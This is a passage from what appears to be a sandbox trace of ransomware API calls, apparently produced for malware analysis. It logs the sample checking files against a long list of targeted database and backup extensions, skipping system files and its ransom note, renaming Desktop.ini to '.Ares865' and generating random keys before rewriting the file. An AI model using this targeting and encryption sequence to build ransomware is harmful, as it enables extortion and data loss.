(lpString="marshal") returned 7 [0058.204] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.204] lstrlenW (lpString="mas") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.204] lstrlenW (lpString="mav") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.204] lstrlenW (lpString="maw") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.204] lstrlenW (lpString="mdbhtml") returned 7 [0058.204] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.204] lstrlenW (lpString="mdn") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.205] lstrlenW (lpString="mdt") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.205] lstrlenW (lpString="mfd") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.205] lstrlenW (lpString="mpd") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.205] lstrlenW (lpString="mrg") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.205] lstrlenW (lpString="mud") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.205] lstrlenW (lpString="mwb") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.205] lstrlenW (lpString="myd") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.205] lstrlenW (lpString="ndf") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.205] lstrlenW (lpString="nnt") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.205] lstrlenW (lpString="nrmlib") returned 6 [0058.205] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.205] lstrlenW (lpString="ns2") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.205] lstrlenW (lpString="ns3") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.205] lstrlenW (lpString="ns4") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.205] lstrlenW (lpString="nsf") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.205] lstrlenW (lpString="nv") returned 2 [0058.205] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.205] lstrlenW (lpString="nv2") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.205] lstrlenW (lpString="nwdb") returned 4 [0058.205] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.205] lstrlenW (lpString="nyf") returned 3 [0058.205] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.205] lstrlenW (lpString="odb") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.206] lstrlenW (lpString="odb") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.206] lstrlenW (lpString="oqy") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.206] lstrlenW (lpString="ora") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.206] lstrlenW (lpString="orx") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.206] lstrlenW (lpString="owc") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.206] lstrlenW (lpString="p96") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.206] lstrlenW (lpString="p97") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.206] lstrlenW (lpString="pan") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.206] lstrlenW (lpString="pdb") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.206] lstrlenW (lpString="pdm") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.206] lstrlenW (lpString="pnz") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.206] lstrlenW (lpString="qry") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.206] lstrlenW (lpString="qvd") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.206] lstrlenW (lpString="rbf") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.206] lstrlenW (lpString="rctd") returned 4 [0058.206] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.206] lstrlenW (lpString="rod") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.206] lstrlenW (lpString="rodx") returned 4 [0058.206] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.206] lstrlenW (lpString="rpd") returned 3 [0058.206] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.206] lstrlenW (lpString="rsd") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.207] lstrlenW (lpString="sas7bdat") returned 8 [0058.207] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.207] lstrlenW (lpString="sbf") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.207] lstrlenW (lpString="scx") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.207] lstrlenW (lpString="sdb") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.207] lstrlenW (lpString="sdc") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.207] lstrlenW (lpString="sdf") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.207] lstrlenW (lpString="sis") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.207] lstrlenW (lpString="spq") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.207] lstrlenW (lpString="te") returned 2 [0058.207] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.207] lstrlenW (lpString="teacher") returned 7 [0058.207] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.207] lstrlenW (lpString="tmd") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.207] lstrlenW (lpString="tps") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.207] lstrlenW (lpString="trc") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.207] lstrlenW (lpString="trc") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.207] lstrlenW (lpString="trm") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.207] lstrlenW (lpString="udb") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.207] lstrlenW (lpString="udl") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.207] lstrlenW (lpString="usr") returned 3 [0058.207] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.208] lstrlenW (lpString="v12") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.208] lstrlenW (lpString="vis") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.208] lstrlenW (lpString="vpd") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.208] lstrlenW (lpString="vvv") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.208] lstrlenW (lpString="wdb") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.208] lstrlenW (lpString="wmdb") returned 4 [0058.208] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.208] lstrlenW (lpString="wrk") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.208] lstrlenW (lpString="xdb") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.208] lstrlenW (lpString="xld") returned 3 [0058.208] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.208] lstrlenW (lpString="xmlff") returned 5 [0058.208] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.208] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865") returned 73 [0058.208] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.210] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.210] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=678) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0058.210] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0058.211] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.211] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.211] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5b0, lpName=0x0) returned 0x154 [0058.212] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5b0) returned 0x190000 [0058.213] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.214] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.214] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.215] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.215] CloseHandle (hObject=0x154) returned 1 [0058.215] CloseHandle (hObject=0x15c) returned 1 [0058.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.216] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d721a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49d721a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.216] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.216] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d655ee8, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0058.216] lstrcmpiW (lpString1="Notepad.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.216] lstrcmpiW (lpString1="Notepad.lnk", lpString2="aoldtz.exe") returned 1 [0058.216] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".") returned 1 [0058.216] lstrcmpiW (lpString1="Notepad.lnk", lpString2="..") returned 1 [0058.216] lstrcmpiW (lpString1="Notepad.lnk", lpString2="windows") returned -1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="bootmgr") returned 1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="temp") returned -1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="pagefile.sys") returned -1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="boot") returned 1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ids.txt") returned 1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ntuser.dat") returned -1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="perflogs") returned -1 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2="MSBuild") returned 1 [0058.217] lstrlenW (lpString="Notepad.lnk") returned 11 [0058.217] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Desktop.ini") returned 65 [0058.217] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Notepad.lnk" | out: lpString1="Notepad.lnk") returned="Notepad.lnk" [0058.217] lstrlenW (lpString="Notepad.lnk") returned 11 [0058.217] lstrlenW (lpString="Ares865") returned 7 [0058.217] lstrcmpiW (lpString1="pad.lnk", lpString2="Ares865") returned 1 [0058.217] lstrlenW (lpString=".dll") returned 4 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".dll") returned 1 [0058.217] lstrlenW (lpString=".lnk") returned 4 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".lnk") returned 1 [0058.217] lstrlenW (lpString=".ini") returned 4 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".ini") returned 1 [0058.217] lstrlenW (lpString=".sys") returned 4 [0058.217] lstrcmpiW (lpString1="Notepad.lnk", lpString2=".sys") returned 1 [0058.217] lstrlenW (lpString="Notepad.lnk") returned 11 [0058.217] lstrlenW (lpString="bak") returned 3 [0058.217] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.217] lstrlenW (lpString="ba_") returned 3 [0058.217] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.217] lstrlenW (lpString="dbb") returned 3 [0058.217] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.217] lstrlenW (lpString="vmdk") returned 4 [0058.217] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.217] lstrlenW (lpString="rar") returned 3 [0058.217] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.217] lstrlenW (lpString="zip") returned 3 [0058.217] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.217] lstrlenW (lpString="tgz") returned 3 [0058.217] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.217] lstrlenW (lpString="vbox") returned 4 [0058.218] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.218] lstrlenW (lpString="vdi") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.218] lstrlenW (lpString="vhd") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.218] lstrlenW (lpString="vhdx") returned 4 [0058.218] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.218] lstrlenW (lpString="avhd") returned 4 [0058.218] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.218] lstrlenW (lpString="db") returned 2 [0058.218] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.218] lstrlenW (lpString="db2") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.218] lstrlenW (lpString="db3") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.218] lstrlenW (lpString="dbf") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.218] lstrlenW (lpString="mdf") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.218] lstrlenW (lpString="mdb") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.218] lstrlenW (lpString="sql") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.218] lstrlenW (lpString="sqlite") returned 6 [0058.218] lstrcmpiW (lpString1="ad.lnk", lpString2="sqlite") returned -1 [0058.218] lstrlenW (lpString="sqlite3") returned 7 [0058.218] lstrcmpiW (lpString1="pad.lnk", lpString2="sqlite3") returned -1 [0058.218] lstrlenW (lpString="sqlitedb") returned 8 [0058.218] lstrcmpiW (lpString1="epad.lnk", lpString2="sqlitedb") returned -1 [0058.218] lstrlenW (lpString="xml") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.218] lstrlenW (lpString="$er") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.218] lstrlenW (lpString="4dd") returned 3 [0058.218] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.218] lstrlenW (lpString="4dl") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.219] lstrlenW (lpString="^^^") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.219] lstrlenW (lpString="abs") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.219] lstrlenW (lpString="abx") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.219] lstrlenW (lpString="accdb") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accdb") returned 1 [0058.219] lstrlenW (lpString="accdc") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accdc") returned 1 [0058.219] lstrlenW (lpString="accde") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accde") returned 1 [0058.219] lstrlenW (lpString="accdr") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accdr") returned 1 [0058.219] lstrlenW (lpString="accdt") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accdt") returned 1 [0058.219] lstrlenW (lpString="accdw") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accdw") returned 1 [0058.219] lstrlenW (lpString="accft") returned 5 [0058.219] lstrcmpiW (lpString1="d.lnk", lpString2="accft") returned 1 [0058.219] lstrlenW (lpString="adb") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.219] lstrlenW (lpString="adb") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.219] lstrlenW (lpString="ade") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.219] lstrlenW (lpString="adf") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.219] lstrlenW (lpString="adn") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.219] lstrlenW (lpString="adp") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.219] lstrlenW (lpString="alf") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.219] lstrlenW (lpString="ask") returned 3 [0058.219] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.220] lstrlenW (lpString="btr") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.220] lstrlenW (lpString="cat") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.220] lstrlenW (lpString="cdb") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.220] lstrlenW (lpString="ckp") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.220] lstrlenW (lpString="cma") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.220] lstrlenW (lpString="cpd") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.220] lstrlenW (lpString="dacpac") returned 6 [0058.220] lstrcmpiW (lpString1="ad.lnk", lpString2="dacpac") returned -1 [0058.220] lstrlenW (lpString="dad") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.220] lstrlenW (lpString="dadiagrams") returned 10 [0058.220] lstrcmpiW (lpString1="otepad.lnk", lpString2="dadiagrams") returned 1 [0058.220] lstrlenW (lpString="daschema") returned 8 [0058.220] lstrcmpiW (lpString1="epad.lnk", lpString2="daschema") returned 1 [0058.220] lstrlenW (lpString="db-journal") returned 10 [0058.220] lstrcmpiW (lpString1="otepad.lnk", lpString2="db-journal") returned 1 [0058.220] lstrlenW (lpString="db-shm") returned 6 [0058.220] lstrcmpiW (lpString1="ad.lnk", lpString2="db-shm") returned -1 [0058.220] lstrlenW (lpString="db-wal") returned 6 [0058.220] lstrcmpiW (lpString1="ad.lnk", lpString2="db-wal") returned -1 [0058.220] lstrlenW (lpString="dbc") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.220] lstrlenW (lpString="dbs") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.220] lstrlenW (lpString="dbt") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.220] lstrlenW (lpString="dbv") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.220] lstrlenW (lpString="dbx") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.220] lstrlenW (lpString="dcb") returned 3 [0058.220] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.221] lstrlenW (lpString="dct") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.221] lstrlenW (lpString="dcx") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.221] lstrlenW (lpString="ddl") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.221] lstrlenW (lpString="dlis") returned 4 [0058.221] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.221] lstrlenW (lpString="dp1") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.221] lstrlenW (lpString="dqy") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.221] lstrlenW (lpString="dsk") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.221] lstrlenW (lpString="dsn") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.221] lstrlenW (lpString="dtsx") returned 4 [0058.221] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.221] lstrlenW (lpString="dxl") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.221] lstrlenW (lpString="eco") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.221] lstrlenW (lpString="ecx") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.221] lstrlenW (lpString="edb") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.221] lstrlenW (lpString="epim") returned 4 [0058.221] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.221] lstrlenW (lpString="fcd") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.221] lstrlenW (lpString="fdb") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.221] lstrlenW (lpString="fic") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.221] lstrlenW (lpString="flexolibrary") returned 12 [0058.221] lstrlenW (lpString="fm5") returned 3 [0058.221] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.221] lstrlenW (lpString="fmp") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.222] lstrlenW (lpString="fmp12") returned 5 [0058.222] lstrcmpiW (lpString1="d.lnk", lpString2="fmp12") returned -1 [0058.222] lstrlenW (lpString="fmpsl") returned 5 [0058.222] lstrcmpiW (lpString1="d.lnk", lpString2="fmpsl") returned -1 [0058.222] lstrlenW (lpString="fol") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.222] lstrlenW (lpString="fp3") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.222] lstrlenW (lpString="fp4") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.222] lstrlenW (lpString="fp5") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.222] lstrlenW (lpString="fp7") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.222] lstrlenW (lpString="fpt") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.222] lstrlenW (lpString="frm") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.222] lstrlenW (lpString="gdb") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.222] lstrlenW (lpString="gdb") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.222] lstrlenW (lpString="grdb") returned 4 [0058.222] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.222] lstrlenW (lpString="gwi") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.222] lstrlenW (lpString="hdb") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.222] lstrlenW (lpString="his") returned 3 [0058.222] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.222] lstrlenW (lpString="ib") returned 2 [0058.222] 